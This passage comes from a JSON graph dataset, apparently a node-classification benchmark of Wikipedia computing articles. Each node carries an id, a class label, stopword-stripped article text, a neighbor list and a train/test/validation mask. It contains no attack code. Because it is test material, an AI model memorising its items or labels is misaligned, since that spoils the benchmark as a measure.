      10061,
      2512,
      4817,
      2901,
      10326,
      7767,
      987,
      2780,
      7775,
      4065,
      7650,
      8291,
      9828,
      10471,
      2283,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      10617,
      1146,
      3323,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 3197,
    "label": 2,
    "text": "Preemption_(computing):preemption computing computing preemption act temporarily interrupting task carried computer system without requiring cooperation intention resuming task later time changes executed task known context switches normally carried privileged task part system known preemptive scheduler power preempt interrupt later resume tasks system given system design operations performed system may preemptible usually applies kernel functions service interrupts permitted run completion would tend produce race conditions resulting deadlock barring scheduler preempting tasks processing kernel functions simplifies kernel design expense system responsiveness distinction user mode kernel mode determines privilege level within system may also used distinguish whether task currently preemptible modern systems preemptive kernels designed permit tasks preempted even kernel mode examples systems solaris 2.0/sunos 5.0 windows nt linux kernel 2.6.x newer aix bsd systems netbsd since version 5 term preemptive multitasking used distinguish multitasking operating system permits preemption tasks cooperative multitasking system wherein processes tasks must explicitly programmed yield need system resources simple terms preemptive multitasking involves use interrupt mechanism suspends currently executing process invokes scheduler determine process execute next therefore processes get amount cpu time given time preemptive multitasking operating system kernel also initiate context switch satisfy scheduling policy priority constraint thus preempting active task general preemption means prior seizure high priority task instance seizes currently running task known preemptive scheduling term preemptive multitasking sometimes mistakenly used intended meaning specific referring instead class scheduling policies known time-shared scheduling time-sharing preemptive multitasking allows computer system reliably guarantee process regular slice operating time also allows system rapidly deal important external events like incoming data might require immediate attention one another process specific time processes grouped two categories waiting input output called i/o bound fully utilizing cpu cpu bound early systems processes would often poll busywait waiting requested input disk keyboard network input time process performing useful work still maintained complete control cpu advent interrupts preemptive multitasking i/o bound processes could blocked put hold pending arrival necessary data allowing processes utilize cpu arrival requested data would generate interrupt blocked processes could guaranteed timely return execution although multitasking techniques originally developed allow multiple users share single machine soon became apparent multitasking useful regardless number users many operating systems mainframes single-user personal computers no-user control systems like robotic spacecraft recognized usefulness multitasking support variety reasons multitasking makes possible single user run multiple applications time run background processes retaining control computer period time process allowed run preemptive multitasking system generally called time slice quantum scheduler run every time slice choose next process run length time slice critical balancing system performance vs process responsiveness time slice short scheduler consume much processing time time slice long processes take longer respond input interrupt scheduled allow operating system kernel switch processes time slices expire effectively allowing processor time shared number tasks giving illusion dealing tasks parallel simultaneously operating system controls design called multi-tasking system today nearly operating systems support preemptive multitasking including current versions windows macos linux including android ios earliest operating systems available home users featuring preemptive multitasking sinclair qdos 1984 amiga os 1985 ran motorola 68000-family microprocessors without memory management amiga os used dynamic loading relocatable code blocks hunks amiga jargon multitask preemptively processes flat address space early pc operating systems ms-dos pc dos support multitasking however alternative operating systems mp/m-86 1981 concurrent cp/m-86 support preemptive multitasking unix-like systems including minix coherent provided preemptive multitasking 1980s-era personal computers later dos versions natively supporting preemptive multitasking/multithreading include concurrent dos multiuser dos novell dos later called caldera opendos dr-dos 7.02 higher since concurrent dos 386 could also run multiple dos programs concurrently virtual dos machines earliest version windows support limited form preemptive multitasking windows 2.1x used intel 80386 virtual 8086 mode run dos applications virtual 8086 machines commonly known dos boxes could preempted windows 95 98 32-bit applications made preemptive running one separate address space 16-bit applications remained cooperative backward compatibility windows 3.1x protected mode kernel virtual device drivers ran preemptively 16-bit applications non-preemptive shared address space preemptive multitasking always supported windows nt versions os/2 native applications unix unix-like systems linux bsd macos vms os/360 many operating systems designed use academic medium-to-large business markets although plans upgrade cooperative multitasking found classic mac os preemptive model preemptive api exist mac os 9 although limited sense abandoned favor mac os x called macos hybrid old mac system style nextstep operating system based mach kernel derived part bsd always provided unix-like preemptive multitasking",
    "neighbors": [
      2560,
      3586,
      7173,
      6155,
      9739,
      6675,
      7187,
      7699,
      5655,
      10776,
      25,
      4637,
      10781,
      9762,
      4643,
      6180,
      3109,
      5158,
      8231,
      6184,
      7217,
      7218,
      10803,
      9784,
      10809,
      2623,
      576,
      2113,
      2625,
      7234,
      3142,
      6730,
      6221,
      2638,
      3160,
      2137,
      2138,
      2140,
      10333,
      3167,
      97,
      1122,
      4194,
      11363,
      7269,
      9829,
      3175,
      5223,
      6760,
      8298,
      8810,
      9835,
      4205,
      10856,
      4207,
      8815,
      7285,
      630,
      4727,
      2168,
      6774,
      634,
      1147,
      7802,
      8822,
      1150,
      5247,
      9335,
      11390,
      2179,
      10883,
      7814,
      10891,
      6797,
      10382,
      7313,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      6815,
      8352,
      5793,
      2210,
      3235,
      6818,
      6821,
      5798,
      9887,
      7852,
      8879,
      3248,
      9391,
      178,
      3250,
      7858,
      6837,
      9907,
      9911,
      6329,
      8889,
      8890,
      4286,
      5823,
      2241,
      2243,
      8388,
      1736,
      2248,
      9932,
      5840,
      5329,
      4308,
      7382,
      10966,
      2264,
      8410,
      731,
      9436,
      1247,
      11489,
      1253,
      7911,
      10985,
      7403,
      9964,
      5358,
      1776,
      8944,
      242,
      5363,
      757,
      2805,
      10485,
      249,
      9466,
      2811,
      8700,
      6909,
      1278,
      8447,
      9468,
      11513,
      10499,
      1798,
      1804,
      6926,
      6415,
      8976,
      273,
      785,
      787,
      1298,
      789,
      5397,
      8977,
      11539,
      10016,
      292,
      6950,
      10235,
      2345,
      7471,
      7983,
      2355,
      309,
      7477,
      823,
      8501,
      4409,
      9525,
      6459,
      5948,
      7483,
      10040,
      7999,
      4928,
      8514,
      11075,
      5956,
      4423,
      7497,
      330,
      1866,
      5452,
      6476,
      6988,
      5457,
      7505,
      7507,
      9044,
      9557,
      11601,
      7511,
      11604,
      2394,
      10590,
      8543,
      1376,
      3426,
      8546,
      11618,
      8551,
      10603,
      5484,
      7020,
      4465,
      11635,
      5492,
      2933,
      1399,
      376,
      7033,
      1402,
      11130,
      8573,
      7039,
      8063,
      3457,
      10113,
      8069,
      7561,
      394,
      3978,
      4492,
      398,
      3470,
      7057,
      9105,
      5523,
      11667,
      11675,
      6044,
      8092,
      2462,
      5022,
      9628,
      421,
      1445,
      935,
      9126,
      4521,
      9643,
      4525,
      10669,
      1967,
      2480,
      7601,
      11184,
      10675,
      10676,
      1461,
      9141,
      1463,
      7607,
      11383,
      6075,
      4030,
      6078,
      9151,
      4548,
      11204,
      3014,
      11205,
      1480,
      4040,
      8136,
      1483,
      9166,
      466,
      2008,
      1499,
      1502,
      5090,
      995,
      9700,
      2536,
      10730,
      9707,
      10731,
      10734,
      6639,
      6128,
      5105,
      8687,
      499,
      4596,
      5619,
      3066,
      5115,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 3198,
    "label": 5,
    "text": "List_of_SIP_response_codes:list sip response codes session initiation protocol sip signalling protocol used controlling communication sessions voice ip telephone calls sip based around request/response transactions similar manner hypertext transfer protocol http transaction consists sip request one several request methods least one response sip requests responses may generated sip user agent user agents divided clients uacs initiate requests servers uases respond single user agent may act uac uas different transactions example sip phone user agent uac making call uas receiving one additionally devices act uac uas single transaction called back-to-back user agents b2buas sip responses specify three-digit integer response code one number defined codes detail status request codes grouped according first digit provisional success redirection client error server error global failure codes corresponding first digit 1–6 expressed example 1xx provisional responses code 100–199 sip response codes consistent http response codes although http response codes valid sip sip responses also specify reason phrase default reason phrase defined response code reason phrases varied however provide additional information provide text different language sip response codes corresponding reason phrases initially defined rfc 3261 rfc also defines sip parameters internet assigned numbers authority iana registry allow rfc provide response codes list includes sip response codes defined ietf rfcs registered sip parameters iana registry list also includes sip response codes defined obsolete sip rfcs specifically rfc 2543 therefore registered iana explicitly noted",
    "neighbors": [
      755,
      10271,
      4725,
      4797
    ],
    "mask": "None"
  },
  {
    "node_id": 3199,
    "label": 1,
    "text": "Jordan_Antiquities_Database_and_Information_System:jordan antiquities database information system jordan antiquities database information system jadis computer database antiquities jordan first kind arab world established department antiquities 1990 cooperation american center oriental research amman sponsored united states agency international development jadis use 2002 superseded new system mega-j 10,841 antiquities registered database",
    "neighbors": [
      2901
    ],
    "mask": "Train"
  },
  {
    "node_id": 3200,
    "label": 1,
    "text": "Qualis_(CAPES):qualis capes qualis brazilian official system purpose classifying scientific production maintained coordenadoria de aperfeiçoamento de pessoal de nível superior capes government agency linked brazilian ministry education qualis task classify evaluate academic means used production scientific publications post-graduate programs master theses doctoral dissertations classification occurs system grades per field evaluation depends level circulation local national international quality journal b c classification annually updated follows series criteria defined capes number issues indexation number publishing institutions impact factor based jcr etc grades called strata occur 1–8 scale a1 highest a2 b1 b2 b3 b4 b5 c — listed",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3201,
    "label": 4,
    "text": "ThunderByte_Antivirus:thunderbyte antivirus thunderbyte anti-virus tbav early antivirus software product created dutchman frans veldman 1988 published company esass b.v mainly designed dos also versions supporting microsoft windows tbav known fast scan speed heuristics-based scanner codice_1 files tracking known-good file information originally thunderbyte used dedicated isa card provide protection operating system even loaded later software-only product released soon displaced hardware offering distributed shareware 1998 tbav sold norman asa discontinued thunderbyte product",
    "neighbors": [
      2213,
      6797,
      7983,
      5368,
      11166
    ],
    "mask": "Test"
  },
  {
    "node_id": 3202,
    "label": 7,
    "text": "EKool:ekool ekool school management system used estonia covering 90 nation school network connecting pupils parents teachers involved estimated application used 28-30 estonians total name ekool means eschool estonian system usable teachers pupils parents exchange information time tables grades homework assignments similar features ekool created 2002 look world foundation cooperation companies private sector originally designed meet requirements four test schools rocca al mare school jüri gymnasium kuresaare gymnasium tallinn arte gymnasium since grown cover 90 estonian school network ekool started 2002 replace printed school diaries digital journals would enable parents students see grades homework assignments online pilot project launched specifications 4 schools rocca al mare school jüri gymnasium kuressaare gymnaasium tallinn arte gymnasium initial look world program ended 2005 turned private company koolitööde next years ekool mostly expanded estonian school system reaching 420 schools 2012 since 2014 ekool also supported mobile application allows students parents access information mobile phones however schools teachers still need use computer ekool accessed combination user-name password estonian id-card estonian mobile-id smart-id online bank identification ekool used various interest groups school personnel students parents extent local government overseeing school one user account person access functionalities different user groups user belongs schools personnel carries data entry process ekool latter used parties right access information among information schools provide parents students access information keep date side make easy school collect contact information parents students enter keep ekool updated using",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3203,
    "label": 3,
    "text": "Volta_(microarchitecture):volta microarchitecture volta codename gpu microarchitecture developed nvidia succeeding pascal first announced roadmap march 2013 however first product announced may 2017 architecture named 18th 19th century italian chemist physicist alessandro volta nvidia first chip feature tensor cores specially designed cores superior deep learning performance regular cuda cores architecture produced tsmc 12 nm finfet process first graphics card use datacentre tesla v100 e.g part nvidia dgx-1 system also used quadro gv100 titan v. mainstream geforce graphics cards based volta volta succeeded turing architecture architectural improvements volta architecture include following volta announced gpu microarchitecture within xavier generation tegra soc focusing self-driving cars nvidia annual gpu technology conference keynote 10th may 2017 nvidia officially announced volta microarchitecture along tesla v100 volta gv100 gpu built 12 nm process size using hbm2 memory 900 gb/s bandwidth nvidia officially announced nvidia titan v december 7 2017 nvidia officially announced quadro gv100 march 27 2018 volta also reported included summit sierra supercomputers used gpgpu compute volta gpus connect power9 cpus via nvlink 2.0 expected support cache coherency therefore improve gpgpu performance",
    "neighbors": [
      3585,
      398,
      9489,
      10658,
      2339,
      7086,
      9774,
      1461,
      9911,
      11322,
      8514,
      7111,
      2635,
      2525,
      11613,
      2277,
      8937,
      11630,
      1776,
      6900,
      2937
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3204,
    "label": 2,
    "text": "AMDGPU:amdgpu amdgpu amd fully open source unified graphics driver linux amdgpu officially supports cards built upon gcn 1.2 higher support previous cards experimental may enabled kernel parameter amdgpu also optional closed-source component operates top open source amdgpu alternative 3d application support known amdgpu-pro",
    "neighbors": [
      2850,
      3586,
      1510,
      1480,
      11080,
      876,
      5356,
      2935,
      7983,
      6705,
      499,
      823,
      11485,
      11130,
      10971,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3205,
    "label": 2,
    "text": "Nokia_E72:nokia e72 nokia e72 smartphone nokia eseries range manufactured finland nokia e72 announced june 15 2009 nokia connections 2009 event singapore successor nokia e71 based similar design form factor offers similar feature set nokia e72 business-oriented phone eseries devices standard features including mobile email calendar instant messaging among many others symbian-based s60 3rd edition feature pack 2 operating system nokia e72 new optical navi key feature addition standard d-pad used many nokia devices including nokia e71 – said improve ease scrolling menus emails internet browser images optical sensor addition series closely spaced buttons comparison predecessor nokia e72 said higher level performance likely due faster 600 mhz arm processor also includes 5-megapixel auto focusing camera changes improvements software-based including changes user interface built-in messaging application among others nokia e73 mode usa feature phone t-mobile usa support t-mobile uma service band iv support 3g different piece hardware internally e72 current firmware device 91.004 published 2 june 2012 check current firmware one may dial 0000 vertu constellation quest 2010 based e72 design",
    "neighbors": [
      1537,
      8577,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      9424,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      9964,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 3206,
    "label": 2,
    "text": "Henry_Spencer:henry spencer henry spencer born 1955 canadian computer programmer space enthusiast wrote regex widely used software library regular expressions co-wrote c news usenet server program also wrote ten commandments c programmers coauthor david lawrence book managing usenet working university toronto ran first active usenet site outside u.s. starting 1981 records period eventually acquired google provide archive usenet 1980s first international usenet site run ottawa 1981 however generally remembered served merely read-only medium later 1981 spencer acquired usenet feed duke university brought utzoo online earliest public archives usenet date may 1981 result small size usenet youthful days spencer early involvement made well-recognised participant commemorated vernor vinge 1992 novel fire upon deep novel featured interstellar communications medium remarkably similar usenet author including spurious message headers one characters appeared solely postings modeled spencer slightly obliquely named also credited claim understand unix condemned reinvent poorly mid-december 2001 google unveiled improved usenet archives go decade deeper internet past millions posts company originally acquired bought existing archive called deja news 1981 1991 running zoology department computer system university toronto spencer copied 2 million usenet messages onto magnetic tapes 141 tapes wound university western ontario google michael schmidt tracked help david wiseman others got transferred onto disks google archives henry spencer helped geoff collyer write c news 1987 around time wrote non-proprietary replacement codice_1 unix library handling regular expressions made freely available api followed eighth edition research unix spencer library used many software packages including tcl mysql postgresql well adapted others including early versions perl circa 1993 spencer donated second version library 4.4bsd following posix standard regular expressions spencer technical lead frees/wan project implementing ipsec cryptographic protocol stack linux also wrote 'aaa amazing awk assembler one longest complex programs ever written awk programming language also developed 4 point font used entomologists labeling pinned insect specimens spencer founding member canadian space society served board directors several times since 1984 mission analysis planning launch orbits css canadian solar sail project defunct software architect canadian science microsatellite dedicated studying variable light stars extrasolar planets launched eurockot 2003 asteroid 117329 spencer named honour highly regarded space enthusiast familiar respected presence several space forums usenet internet 1983 2007 spencer posted 34,000 messages sci.space newsgroups knowledge space history technology corrected henry spencer virtual t-shirt award created reward anyone catch error fact",
    "neighbors": [
      7872,
      6369,
      515,
      8612,
      8582,
      7022,
      7376,
      2804,
      692,
      3350,
      823,
      5492,
      8539,
      2045,
      3742,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 3207,
    "label": 4,
    "text": "Bill_Woodcock:bill woodcock bill woodcock born august 16 1971 san francisco california united states executive director packet clearing house non-profit research institute dedicated understanding supporting internet traffic exchange technology policy economics bill entered field internet routing research 1989 serving network architect operations director international multiprotocol service-provision backbone network 1993 1994 woodcock one founders packet clearing house served current post executive director since 1997 time woodcock directly participated establishment three hundred public internet exchange points europe africa asia americas continues serve boards provide ongoing technical policy advice many institutions 1998 woodcock j.d falk model spam regulation became first anti-spam legislation world california law 17538.4 paved way jurisdictions woodcock successfully concluded telecommunications regulatory reform efforts several african countries woodcock director roles four companies areas satellite communications content distribution domain name service technology 2001 woodcock co-authored chuck goolsbee chuck woody fiendishly difficult mac-mgrs trivia quiz annual gathering member macintosh managers mailing list san francisco macworld expo date 50 questions remain unanswered twenty years together richard ford initially brita meng hosted annual inaptly named a/ux user group dinner conjunction mactivity macworld meetings woodcock current former packet clearing house representative afrinic apnic arin iepg isoc isp/c lacnic natoa ripe bill woodcock regular speaker afnog apia apnic apricot arin isoc ripe iepg ietf sanog nanog meetings served program committees nanog sanog pam apricot woodcock one estonia computer attacks unleashed bronze soldier tallinn incident assisted defense coordinated hillar aarelaid cert-ee wake itu december 2012 world conference international telecommunications characterized attempted take-over institutions internet governance woodcock published number secret itu budget documents acted point-person effort redirect usd 11m u.s. government funds itu contributions support multistakeholder model internet governance effort centered people petition web site received much favorable attention press internet governance community woodcock published work includes many pch white-papers 1993 mcgraw-hill book networking macintosh report anf appletalk tunneling architectures working group chaired 1993 1994 many articles network world macworld macweek connections networking journals periodicals addition principal author multicast dns ip anycast operator requirements infrastructure management methods ietf drafts early 1990s pioneered igp egp-based topological load-balancing techniques using ip anycast technology together mark kosters proposed 1996 montreal iepg root dns servers migrated ip anycast work provided basis upon root dns servers deployed since late 1990s 2010 2011 rick lamb previously built signing system places dnssec cryptographic signatures dns root zone woodcock built first global-scale fips 140-2 level 4 dnssec signing infrastructure locations singapore zurich san jose addition protocol development work woodcock developed networking products cisco agilent farallon",
    "neighbors": [
      4952,
      2050,
      3259,
      9688
    ],
    "mask": "Test"
  },
  {
    "node_id": 3208,
    "label": 1,
    "text": "World_Database_of_Happiness:world database happiness world database happiness web-based archive research findings subjective appreciation life database contains overview scientific publications happiness digest research findings database contains information happy people wide range circumstances 165 different nations happiness defined degree individual judges quality life whole favorably two 'components happiness distinguished hedonic level affect degree pleasant affect dominates contentment perceived realization wants world database happiness tool acquire overview ever-growing stream research findings happiness accumulation knowledge stagnates scientists capitalize earlier research investments medio 2013 database covered 19,000 scientific findings happiness 6000 distributional findings happy people another 13,000 correlational findings associated less happiness first findings date 1915 world database happiness often used popular media make lists happiest countries around globe example happy planet index aims chart sustainable happiness world combining data longevity happiness size ecological footprint citizens database clear conceptual focus includes research findings subjective enjoyment one ’ life whole thereby evades babel haunted study happiness ages side coin much interesting research left findings reported technical details measurement statistical analysis detail welcomed scholars makes information difficult digest lay-persons still another limitation available findings often contradictory makes hard draw firm conclusions causes happiness clear poor health separation unemployment lack social contact strongly negatively associated unhappiness another problem world database happiness number studies happiness increases high rate gets increasingly difficult offer complete overview research findings",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 3209,
    "label": 9,
    "text": "Jape_(software):jape software jape configurable graphical proof assistant originally developed richard bornat queen mary university london bernard sufrin university oxford allows user define logic decide view proofs much works variants sequent calculus natural deduction claimed jape popular program computer-assisted logic teaching involves exercises developing proofs mathematical logic program available mac unix windows operating systems written java programming language released gnu gpl",
    "neighbors": [
      5492,
      5677,
      6797,
      4791
    ],
    "mask": "None"
  },
  {
    "node_id": 3210,
    "label": 7,
    "text": "Unigine:unigine unigine proprietary cross-platform game engine developed russian software company unigine corp. apart use game engine mainly used enterprise area simulators virtual reality systems serious games visualization distinguishing feature unigine support large open worlds planet scale also advanced 3d renderer currently supports opengl 4 directx 11 updated unigine sdk released 3 months unigine engine also core technology lineup benchmarks cpu gpu power supply cooling system used overclockers technical media tom hardware linus tech tips pc gamer others unigine benchmarks also included part phoronix test suite benchmarking purposes linux systems first public release 0.3 version may 4 2005 unigine engine created scratch based engine last update released july 7 2014 initially started microsoft windows linux support platforms added later os x playstation 3 android ios experimental support webgl included official sdk unigine 1 support several graphical apis directx 9 directx 10 directx 11 opengl opengl es playstation 3 initial versions v0.3x opengl support 3 apis developers c++ c uniginescript proprietary scripting language similar с++ syntax custom shaders written glsl hlsl languages unigine 1 several features required professional simulators enterprise vr systems mostly support large virtual scenarios specific hardware often called serious games support large virtual worlds implemented via double precision coordinates 64-bit per axis zone-based background data streaming optional operations geographic coordinate system latitude longitude elevation instead x z video output sophisticated displays implemented via so-called multi-channel rendering network-synchronized image generation single large image several computers standard approach professional simulators system enabled support multiple output devices asymmetric projections e.g cave curved screens multiple projectors requiring image warping edge blending also supported also various types stereoscopic 3d output supported anaglyph separate images output nvidia 3d vision well vr hmd support oculus rift unigine 1 also supported multi-monitor output video-walls unigine renderer supports shader model 5.0 hardware tessellation directcompute well opencl together set post-processes including screen space ambient occlusion ssao real-time global illumination set built-in high-level objects like terrain grass water clouds unigine uses proprietary physics engine collision detection rigid body physics dynamical destruction objects rag doll cloth fluid buoyancy force fields time reverse pathfinding also implemented proprietary engine together basic ai components spatial triggers callbacks features includes interactive 3d gui video playback using theora codec 3d audio system based openal library wysiwyg scene editor unigineeditor originally released october 10 2015 unigine 2 features unigine 1 focus simulators enterprise use main differences transition forward rendering deferred rendering approach pbr shading introduction several new graphical technologies like geometry water multi-layered volumetric clouds ssrtgi voxel-based lighting introduction c api supported platforms microsoft windows linux os x support stopped starting 2.6 version unigine 2 supports following graphical apis directx 11 opengl 4.x 3 apis developers c++ c uniginescript supported shader languages hlsl glsl uusl unified unigine shader language proprietary ssrtgi screen space ray-traced global illumination rendering technology introduced 2.5 version presented siggraph 2017 real-time live event roots unigine frustum.org open source project initiated 2002 alexander frustum zaprjagaev co-founder along denis shergin ceo ex-cto unigine corp name unigine means universal engine unique engine november 25 2010 unigine corp announced competition support linux game development agreed give away free license unigine engine anyone willing develop release game linux native client would also grant team windows license competition ran december 10 2010 considerable number entries submitted due unexpected response unigine decided extend offer three best applicants getting full unigine licenses winners announced december 13 2010 developers selected kot-in-action creative artel previously developed steel storm gamepulp intend make puzzle platformer med-art previously worked 2019 company claimed 200 b2b customers worldwide primarily use unigine military virtual reality projects several notable projects include graphical benchmarks cad systems unigine engine used platform series benchmarks used determine stability pc hardware cpu gpu power supply cooling system extremely stressful conditions well overclocking",
    "neighbors": [
      2368,
      8454,
      8937,
      2826,
      11306,
      5612,
      6797,
      4334,
      6900,
      2293,
      4182,
      823,
      9691,
      11700,
      5914,
      5083,
      1916,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 3211,
    "label": 3,
    "text": "Interrupt_coalescing:interrupt coalescing interrupt coalescing also known interrupt moderation technique events would normally trigger hardware interrupt held back either certain amount work pending timeout timer triggers used correctly technique reduce interrupt load order magnitude incurring relatively small latency penalties interrupt coalescing typically combined either hardware fifo direct memory access allow continued data throughput interrupts held back interrupt coalescing common feature modern network cards technique dates back early computer uarts 16550 uart chip used ibm pc serial interface time even servicing interrupt rates required low data rate serial data streams day taxing contemporary cpus interrupt coalescing also implemented without support hardware disabling interrupts interrupt controller using timer-based polling",
    "neighbors": [
      5457,
      3027,
      3637
    ],
    "mask": "Test"
  },
  {
    "node_id": 3212,
    "label": 9,
    "text": "Hash_consing:hash consing computer science particularly functional programming hash consing technique used share values structurally equal term hash consing originates implementations lisp attempt reuse cons cells constructed avoiding penalty memory allocation hash consing commonly implemented hash tables storing weak references may garbage-collected data stored therein contains references outside table hash consing shown give dramatic performance improvements—both space time—for symbolic dynamic programming algorithms interesting property hash consing two structures tested equality constant time turn improve efficiency divide conquer algorithms data sets contain overlapping blocks simple efficient suitable demonstration concept implementation memoizer means hash table weak references scheme",
    "neighbors": [
      2304,
      10083,
      4101,
      6502,
      11674,
      541
    ],
    "mask": "Test"
  },
  {
    "node_id": 3213,
    "label": 4,
    "text": "Security_Descriptor_Definition_Language:security descriptor definition language security descriptor definition language sddl defines string format used describe security descriptor text string",
    "neighbors": [
      5573,
      2959
    ],
    "mask": "None"
  },
  {
    "node_id": 3214,
    "label": 4,
    "text": "HP_Data_Protector:hp data protector hp data protector software automated backup recovery software single-server enterprise environments supporting disk storage tape storage targets provides cross-platform online backup data microsoft windows unix linux operating systems business- mission-critical applications hp data protector zero downtime backup leverages array-based solutions offload processing server perform backup operations copy production data hp data protector instant recovery retrieves data replicated images disk recovery specific points time hp data protector originated omniback last version use omniback name version 4.1 retired 2004 hewlett-packard acquired apollo computer 1989 latter already developed backup system entitled omniback network backup system available market time hp continued develop product omniback name purpose backing individual files raw disk partitions related distinct product omniback/turbo developed backing databases 1996 hp released omniback ii 2.0 merged omniback ii omniback/turbo single product although still impossible create single job would contain database file system backup windows nt port released version 2.3 version 2.55 released 1997 included support hp-ux ibm aix interim hewlett-packard withdrew development slovenia germany significant time spent delivering version 3.5.2 solaris complete however allowed quick ports tru64 linux version 5.0 omniback name dropped since product called hp openview storage data protector hp storageworks data protector product called hp data protector software hp announced release hp data protector 9.0 part adaptive backup recovery initiative may 2014 released july 2014 released july 2014 along two companion products hp data protector management pack hp backup navigator hp data protector architecture based concept cell network environment contains cell manager clients backup devices cell manager main system centrally controls manages cell contains database runs core software runs backup restore sessions writing session information database client system within cell clients backed require installation disk agent clients control backup restore data require installation media agent multi-site operations data protector manager managers mom allows local administrators control data backup restore providing centralized enterprise monitoring media management configuration multiple data protector cells grouped configured managed mom hp data protector offers data deduplication capabilities ability compare blocks data written backup device data blocks previously stored device data deduplication hp data protector allows disk-based data storage target storage tape drives used deduplication targets sequential nature opposed block-oriented nature disk-devices hp data protector supports backup restore virtual servers including protection whole virtual machine application data supported virtual environments include vmware windows 2008 hyper-v limited microsoft virtual server 2005 hp integrity virtual machines citrix xenserver support longer officially provided hp data protector includes automated key management software linear tape-open lto-4 encryption users choice client-based encryption data security use encryption functionality lto-4 later generation tape drives november 2009 hp began offering hp data protector notebook extension hp data protector notebook extension enables users back recover data working remotely offline hp data protector notebook extension data captured backed automatically time user changes creates receives file processes transparent user impact laptop desktop performance data stored temporarily local repository pending transfer network data vault full backup restore capabilities key features include end-user single-click recovery encryption compression techniques granular recovery extensions components sit inside applications provide operator application way triggering large restore selecting individual items need restored without requiring assistance backup administrator example vmware granular recovery extension appears extra item vsphere console vcenter lets vmware administrator restore vmdk file finally provides interface selecting files vmdk file sharepoint gre allows microsoft sharepoint administrators recover single document collection folder directly via sharepoint gui granular recovery sharepoint 2010 introduced version 7.0",
    "neighbors": [
      5384,
      6153,
      6797,
      8212,
      1304,
      8229,
      3366,
      7983,
      823,
      5571,
      7243,
      1358,
      3281,
      1874,
      2258,
      11100,
      1638,
      6765,
      11505,
      5492,
      5756
    ],
    "mask": "Test"
  },
  {
    "node_id": 3215,
    "label": 4,
    "text": "Turnstile:turnstile turnstile also called baffle gate turnstyle form gate allows one person pass time also made enforce one-way traffic people addition restrict passage people insert coin ticket pass similar thus turnstile used case paid access sometimes called faregate ticket barrier used purpose example access public transport pay toilet restrict access authorized people example lobby office building turnstiles originally used like forms stile allow human beings pass keeping sheep livestock penned use turnstiles modern applications credited clarence saunders used first piggly wiggly store turnstiles used wide variety settings including stadiums amusement parks mass transit stations office lobbies airports ski resorts factories power plants casinos business/revenue standpoint turnstiles give accurate verifiable count attendance security standpoint lead patrons enter single-file security personnel clear view patron enables security efficiently isolate potential trouble confiscate prohibited materials hand physical barriers become serious safety issue speedy evacuation needed requiring emergency exits bypass turnstiles persons disabilities may difficulties using turnstiles cases generally wide aisle gate manual gate may provided locations luggage expected line turnstiles may entirely formed wide aisle gates example heathrow terminals 2 3 underground station turnstiles often use ratchet mechanisms allow rotation stile one direction allowing ingress preventing rotation direction often designed operate payment made usually inserting coin token slot swiping tapping inserting paper ticket electronically-encoded card turnstiles often used counting numbers people passing gate even payment involved used extensively manner amusement parks order keep track many people enter exit park ride ride first major use turnstiles sporting venue hampden park glasgow scotland waist-high turnstiles often used fairs attractions arenas user inserts ticket pass slot barcode read access granted sensor determines speed user passes sets electric motor turn turnstile corresponding speed sometimes also referred half-height turnstiles fixed arm style traditionally popular type turnstile many variations style available including one designed accompanied matching ticket box one ticket box built styles designed allow entry payment actual coins tokens inserted others allow access valid barcode electronically read disadvantage type people jump turnstile happens commonly moscow metro mass transport systems russia optical turnstiles alternative traditional arm -style turnstile increasingly used locations physical barrier deemed unnecessary unaesthetic optical turnstiles generally use infrared beam count patrons recognize anyone attempting enter site without valid entry pass drop arm optical turnstile combination security tripod barrier turnstile fully optical turnstile lanes either single double arms access granted arms drop recesses cabinet arms drop way turnstile functions fully optical turnstile full-height turnstile larger version turnstile commonly high similar operation revolving door eliminates possibility inherent waist-high style someone jumping turnstile however type turnstile functions differently revolving door often allow someone come someone else goes also pejoratively known iron maiden torture device name high-wheel sometimes called rotogate especially chicago used unstaffed exits chicago l stations also used increasingly new york city subway stations since turn 21st century europe however rotogate refers different kind gate turnstile two types full height turnstiles high entrance/exit turnstile heet exit-only difference heet turnstiles rotate directions thus allowing two-way traffic exit-only turnstiles rotate one direction thus allowing one-way traffic exit-only turnstiles commonly used mass transit stations allow passengers exit system without interfering entering exit-only models also used enclosed areas theme parks zoos amusement parks allow visitors leave denying admission paid additionally single double tandem turnstiles contain two rotors side side frame allows throughput limited space tandems frequently narrow two single turnstiles placed side-by-side public transport systems soviet union common use turnstiles entrance subway stations first introduced moscow metro 7 november 1958 city buses commuter trains usually operated proof-of-payment system fare collection became pressing business post-soviet russia railway terminals high-traffic railway station moscow area nizhny novgorod elsewhere turnstiles installed early 2000s moscow authorities sought improve fare collection since enclosing bus tram stops providing fare gates feasible installed turnstiles inside city bus tram practice caused passenger complaints slowed boarding compared traditional honor system similar system use brazilian chilean city buses hong kong trams",
    "neighbors": [
      2737,
      7068
    ],
    "mask": "Test"
  },
  {
    "node_id": 3216,
    "label": 2,
